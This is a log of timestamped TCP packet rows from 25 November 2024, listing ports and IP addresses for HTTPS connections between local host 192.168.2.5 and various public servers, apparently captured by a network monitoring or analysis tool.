Nov 25, 2024 11:34:04.547379017 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.547509909 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.547521114 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.593352079 CET	443	49881	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:04.593446016 CET	49881	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:04.593455076 CET	443	49881	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:04.593534946 CET	443	49881	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:04.593589067 CET	49881	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:04.599478960 CET	49881	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:04.599486113 CET	443	49881	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:04.639849901 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:04.639924049 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:04.640052080 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:04.640245914 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:04.640295029 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:04.811731100 CET	443	49889	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.811764956 CET	443	49886	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.814690113 CET	443	49888	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.814752102 CET	443	49888	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.814755917 CET	443	49889	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.814877987 CET	49888	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.814950943 CET	49889	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815175056 CET	443	49886	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.815263987 CET	49888	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815270901 CET	443	49888	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.815283060 CET	49888	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815287113 CET	443	49888	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.815303087 CET	49886	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815352917 CET	49889	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815360069 CET	443	49889	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.815368891 CET	49889	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.815372944 CET	443	49889	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.817595005 CET	49886	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.817626953 CET	443	49886	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.817656040 CET	49886	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.817671061 CET	443	49886	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.818715096 CET	443	49885	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.818955898 CET	443	49885	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.819027901 CET	49885	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.820909023 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.820921898 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.821393967 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.823220015 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.823244095 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.823537111 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.826080084 CET	49885	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.826083899 CET	443	49885	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.826093912 CET	49885	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.826097965 CET	443	49885	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.827066898 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.827075005 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.827306032 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.827322960 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.827358007 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.827466965 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.827477932 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.828620911 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.828649044 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.830032110 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.830051899 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.830930948 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.831994057 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.832020998 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.854502916 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:04.854571104 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:04.854825020 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:04.855093956 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:04.855134010 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:04.855554104 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:04.855560064 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:04.856004000 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:04.856447935 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:04.856458902 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:04.867624044 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:04.867654085 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:04.867947102 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:04.868494987 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:04.868501902 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:04.868566990 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:04.868731022 CET	49914	443	192.168.2.5	204.79.197.237
Nov 25, 2024 11:34:04.868756056 CET	443	49914	204.79.197.237	192.168.2.5
Nov 25, 2024 11:34:04.869035006 CET	49915	443	192.168.2.5	20.110.205.119
Nov 25, 2024 11:34:04.869046926 CET	443	49915	20.110.205.119	192.168.2.5
Nov 25, 2024 11:34:04.871304035 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:04.871310949 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:04.871587992 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:04.871877909 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:04.871889114 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:04.872204065 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:04.872240067 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:04.872293949 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:04.872607946 CET	49917	443	192.168.2.5	108.139.47.50
Nov 25, 2024 11:34:04.872618914 CET	443	49917	108.139.47.50	192.168.2.5
Nov 25, 2024 11:34:04.873090029 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:04.873111010 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:04.873295069 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:04.873486996 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:04.873500109 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:04.885529995 CET	443	49887	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.888741016 CET	443	49887	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.888782024 CET	443	49887	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.888792038 CET	49887	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.888847113 CET	49887	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.890654087 CET	49887	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.890657902 CET	443	49887	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.893244982 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.893260002 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.893320084 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.893692017 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:04.893702984 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:04.991734028 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:04.992227077 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:04.992249012 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:04.993123055 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:04.993186951 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:04.994565010 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:04.994621038 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.021303892 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.021518946 CET	49893	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.021543026 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.021877050 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.022378922 CET	49893	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.022444963 CET	443	49893	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.048563004 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.048573017 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.048674107 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.048917055 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.048928976 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.070806026 CET	49893	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.197586060 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.197602034 CET	443	49892	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.211121082 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.211210012 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.211612940 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.211620092 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214456081 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214462042 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214643955 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214662075 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214729071 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214732885 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214816093 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214828968 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214848995 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214859009 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214900017 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214910984 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.214926958 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214951992 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.214972973 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215136051 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215220928 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215235949 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215322971 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215336084 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215365887 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215379000 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215413094 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215431929 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215454102 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215466976 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215476036 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215495110 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215543985 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215555906 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.215564966 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215604067 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215616941 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:05.215706110 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:05.369761944 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.370512009 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.370527029 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.371752024 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.371829987 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.376081944 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.376147985 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.382462978 CET	49892	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.409842968 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.410100937 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.410113096 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.411178112 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.411226988 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.411556959 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.411618948 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.415455103 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.415462971 CET	443	49895	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.417886019 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.418087006 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.418095112 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.421370983 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.421437979 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.421858072 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.421917915 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.460539103 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.460751057 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.460783005 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.460865974 CET	49895	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.462223053 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.462286949 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.462805986 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.462891102 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.493048906 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.493055105 CET	443	49896	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.493153095 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.493159056 CET	443	49898	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.508158922 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.508169889 CET	443	49897	172.64.41.3	192.168.2.5
Nov 25, 2024 11:34:05.554577112 CET	49897	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.604655027 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.604975939 CET	49900	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.604986906 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.605451107 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.605964899 CET	49900	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.606050014 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.644866943 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.645092964 CET	49899	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.645107985 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.645442963 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.645813942 CET	49899	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.645876884 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:05.652132988 CET	49900	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.682389975 CET	49896	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.682466984 CET	49898	443	192.168.2.5	172.64.41.3
Nov 25, 2024 11:34:05.697642088 CET	49899	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:05.739734888 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.739953041 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.739972115 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.740989923 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.741053104 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.742055893 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.742115021 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.742350101 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.742357016 CET	443	49901	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.782558918 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.782780886 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.782790899 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.782923937 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.783085108 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.783094883 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.783663034 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.783720016 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784085035 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784106970 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.784152031 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.784156084 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784468889 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784538031 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.784607887 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784615993 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.784647942 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.784655094 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.789854050 CET	49901	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.797346115 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.797619104 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.797630072 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.798654079 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.798711061 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.799027920 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.799086094 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.799259901 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.799267054 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:05.833676100 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.892323017 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:05.892358065 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:05.892426968 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:05.892786026 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:05.892805099 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:05.922523975 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922548056 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922564030 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922609091 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.922636032 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922652960 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.922678947 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.922684908 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922699928 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.922738075 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.924155951 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:05.926403999 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:05.926418066 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:05.927469015 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:05.927530050 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:05.933289051 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:05.933370113 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:05.934075117 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:05.934082985 CET	443	49907	23.200.0.6	192.168.2.5
Nov 25, 2024 11:34:05.934583902 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.934598923 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.934607983 CET	49880	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:05.934612036 CET	443	49880	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:05.980635881 CET	49907	443	192.168.2.5	23.200.0.6
Nov 25, 2024 11:34:05.982739925 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:05.982779026 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.085623026 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:06.085894108 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:06.085906982 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:06.089453936 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:06.089553118 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:06.091789007 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:06.091916084 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:06.108170033 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:06.108201027 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:06.108386993 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:06.111763954 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.111799955 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:06.111810923 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:06.112056017 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.112063885 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.113078117 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.113146067 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.116010904 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.116091013 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.146550894 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:06.146775961 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:06.146789074 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:06.148458958 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:06.148521900 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:06.150168896 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:06.150252104 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:06.156605959 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:06.156847954 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:06.156863928 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:06.157993078 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:06.158070087 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:06.160007000 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:06.160082102 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:06.195724010 CET	49916	443	192.168.2.5	23.44.201.35
Nov 25, 2024 11:34:06.195724010 CET	49913	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.195734024 CET	443	49916	23.44.201.35	192.168.2.5
Nov 25, 2024 11:34:06.195744991 CET	443	49913	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.195756912 CET	49918	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:06.195770025 CET	443	49918	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:06.211735010 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:06.211744070 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:06.260008097 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:06.265860081 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.266141891 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.266160965 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.267222881 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.267581940 CET	49906	443	192.168.2.5	13.107.246.63
